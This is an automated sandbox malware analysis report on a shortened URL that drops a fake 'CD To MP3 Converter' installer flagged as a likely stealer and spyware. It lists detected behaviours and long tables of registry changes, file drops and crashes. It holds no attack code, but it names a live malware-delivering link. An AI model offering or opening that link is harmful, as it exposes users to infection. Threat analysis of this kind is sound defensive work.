Malware Analysis Report

2024-10-16 05:32

Sample ID 240714-wh1cbs1dln
Target https://ify.ac/1Ic5
Tags
discovery execution spyware stealer antivm
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

Threat Level: Likely malicious

The file https://ify.ac/1Ic5 was found to be: Likely malicious.

Malicious Activity Summary

discovery execution spyware stealer antivm

Downloads MZ/PE file

Command and Scripting Interpreter: PowerShell

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Checks BIOS information in registry

Loads dropped DLL

Executes dropped EXE

Reads user/profile data of web browsers

Checks computer location settings

Drops Chrome extension

Enumerates connected drives

Checks installed software on the system

Drops desktop.ini file(s)

Drops file in System32 directory

Drops file in Windows directory

Checks CPU configuration

Changes its process name

Reads CPU attributes

Drops file in Program Files directory

Writes file to tmp directory

Enumerates physical storage devices

Enumerates kernel/hardware configuration

Reads runtime system information

Program crash

Uses Task Scheduler COM API

Modifies data under HKEY_USERS

NTFS ADS

Modifies Internet Explorer settings

Uses Volume Shadow Copy WMI provider

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Enumerates system info in registry

Modifies registry class

Modifies system certificate store

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Uses Volume Shadow Copy service COM API

Suspicious behavior: MapViewOfSection

Suspicious use of FindShellTrayWindow

Scheduled Task/Job: Scheduled Task

Suspicious use of SendNotifyMessage

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-14 17:56

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-14 17:56

Reported

2024-07-14 18:01

Platform

win10-20240404-en

Max time kernel

299s

Max time network

303s

Command Line

"C:\Windows\system32\LaunchWinApp.exe" "https://ify.ac/1Ic5"

Signatures

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-6SDC9.tmp\setup_woMGQPOBj7.tmp N/A

Checks installed software on the system

discovery

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\rescache\_merged\3720402701\1568373884.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rescache\_merged\3720402701\1568373884.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rescache\_merged\3720402701\1568373884.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File opened for modification C:\Windows\Debug\ESE.TXT C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
File created C:\Windows\rescache\_merged\3720402701\1568373884.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
File created C:\Windows\rescache\_merged\3720402701\1568373884.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\system32\browser_broker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Cookies\CacheLimit = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "140" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\MrtCache C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{636B1326-B3B1-4FBB-A942-7AA4E1634C21} = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 18bef62517d6da01 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage\ProcessingFlag = c0f7bb3a17d6da01 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\FileNames C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\CIPolicyState = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\google.com\NumberOfSubdoma = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\ify.ac\ = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\Extensions C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "268435456" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating\Next Rating Prompt = 20792d0d25dada01 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\PersistedStorageItemTable\System\{3A6B00F0-A754-4E7E-933B-1DEAFF04BC1 C:\Windows\system32\browser_broker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionHigh = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\ify.ac\Total = "533" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$http://www.typepad.com/ C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\ify.ac\ = "90" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\ify.ac\ = "105" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating\NextPromptBuild = "15063" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Explorer\Main\OperationalData = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\ify.ac\ = "62" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\ify.ac\Total = "532" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\CIStatus\SignaturePolicy = 06000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "531" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\ify.ac\Total = "562" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\google.com\ = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\google.com\Total = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DeviceId = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\ify.ac\Total = "1020" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 870abc3a17d6da01 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VendorId = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
